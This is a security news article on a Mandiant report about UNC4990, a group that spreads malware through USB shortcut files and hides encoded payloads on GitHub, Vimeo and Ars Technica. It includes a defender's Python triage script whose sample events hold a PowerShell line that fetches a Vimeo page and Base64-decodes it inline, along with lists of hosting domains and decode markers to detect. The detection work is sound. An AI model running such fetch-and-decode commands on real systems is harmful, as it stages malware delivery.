Cybersecurity firm Mandiant recently uncovered a financially motivated threat actor, UNC4990, utilizing USB devices for initial infections. The group is exploiting legitimate online platforms such as GitHub, Vimeo, and Ars Technica. The threat actor cleverly hides encoded payloads within seemingly benign content on these platforms, evading suspicion and leveraging trusted content delivery networks.
A Look into UNC4990 USB-Based Attacks
The attackers initiate their campaign through USB devices containing malicious LNK shortcut files, according to the report. When a victim inadvertently opens the shortcut, a PowerShell script named explorer.ps1 runs. This script downloads an intermediary payload which, once decoded, yields the URL from which the malware downloader named ‘EMPTYSPACE’ is fetched.
UNC4990 employs various hosting methods for intermediary payloads, including encoded text files on GitHub and GitLab. However, they have shifted strategies to abuse Vimeo and Ars Technica for hosting Base64 encoded and AES-encrypted string payloads. Notably, the attackers don’t exploit vulnerabilities in these platforms but utilize regular features like Ars Technica forum profiles and Vimeo video descriptions.
These payloads, which appear as harmless text strings on the hosting platforms, play a critical role in the attack chain by facilitating the download and execution of malware. By embedding payloads within legitimate content on reputable platforms, UNC4990 evades suspicion and rides on trusted networks, making it hard for security controls to flag the traffic as malicious.
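A defender can turn the two observable traits described above (a PowerShell script named explorer.ps1 launched from removable media, and PowerShell fetching a string from one of the named content platforms and decoding it inline) into a simple process-creation triage check. The following is an added example written for this article, not code from Mandiant or the report; the event records are constructed, the field names (image, parent, cmdline) are assumed, and the non-system-drive rule is a heuristic of my own, not an indicator from the report.

```python
import re

# Constructed sample process-creation events (hypothetical field names; not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File E:\explorer.ps1"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -c \"$s=(iwr 'https://vimeo.com/<video-id>').Content;"
                " [Convert]::FromBase64String($s)\""},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Vendor\updater.exe",
     "cmdline": r"powershell.exe -File C:\ProgramData\Vendor\maint.ps1"},
]

# Platforms the article names as hosts for the intermediary payload.
CONTENT_HOSTS = ("github.com", "raw.githubusercontent.com", "gitlab.com",
                 "vimeo.com", "arstechnica.com")
# Markers of inline Base64 / AES decoding in a PowerShell command line.
DECODE_MARKERS = ("frombase64string", "createdecryptor")


def is_powershell(image: str) -> bool:
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))


def flag_event(ev: dict) -> list:
    """Return the reasons an event matches the UNC4990 pattern (empty list if none)."""
    reasons = []
    if not is_powershell(ev["image"]):
        return reasons
    cmd = ev["cmdline"].lower()
    # Article fact: the USB shortcut launches a script named explorer.ps1.
    if "explorer.ps1" in cmd:
        reasons.append("script named explorer.ps1 (UNC4990 USB lure)")
    # Heuristic (assumption, not from the report): a .ps1 run from a drive other than C:
    # is consistent with execution from removable media and deserves a look.
    m = re.search(r"(?<![a-z])([d-z]):\\[^\s\"']*\.ps1", cmd)
    if m:
        reasons.append(f"script executed from non-system drive {m.group(1).upper()}:")
    # Article fact: encoded payload strings are fetched from the named platforms and decoded.
    hosts = [h for h in CONTENT_HOSTS if h in cmd]
    decodes = [d for d in DECODE_MARKERS if d in cmd]
    if hosts and decodes:
        reasons.append(f"fetches {hosts} and decodes inline via {decodes}")
    return reasons


def triage(events: list) -> list:
    """Pair each suspicious event's index with its reasons, skipping clean events."""
    return [(i, r) for i, ev in enumerate(events) if (r := flag_event(ev))]
```

Running triage over SAMPLE_EVENTS flags the first two records and leaves the vendor maintenance script alone; in production the same checks would run over Sysmon Event ID 1 or Windows 4688 data.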
The UNC4990 attack chain progresses with the deployment of QUIETBOARD, a sophisticated backdoor with diverse capabilities. This multi-component backdoor, once activated, executes commands from the command and control (C2) server, alters clipboard content for cryptocurrency theft, infects USB drives to spread malware, captures screenshots for information theft, and gathers detailed system and network information. QUIETBOARD demonstrates persistence across system reboots and supports the addition of new functionalities through extra modules.
Despite conventional prevention measures, USB-based malware continues to pose a significant threat, serving as an effective propagation medium for cybercriminals. The unique tactic of UNC4990, leveraging seemingly innocuous platforms for intermediate payloads, challenges conventional security paradigms and underscores the need for continual vigilance in the ever-evolving landscape of cybersecurity.